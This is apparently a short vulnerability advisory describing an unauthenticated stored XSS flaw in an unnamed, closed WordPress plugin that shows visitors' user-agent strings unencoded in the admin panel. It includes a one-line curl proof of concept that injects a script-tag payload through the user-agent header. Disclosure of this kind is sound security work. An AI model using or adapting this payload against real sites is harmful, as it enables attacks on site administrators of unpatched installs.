The plugin is affected by an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability. The plugin would display the user's user agent string without validation or encoding within the WordPress admin panel.
Proof of Concept
$ curl -i http://localhost:10008/ --user-agent "</script><script>alert(1)</script>" The payload will be executed on the "visitors" page within the WordPress admin panel.
No known fix - plugin closed
2021-05-26 (about 3 months ago)
2021-05-27 (about 3 months ago)
2021-07-11 (about 2 months ago)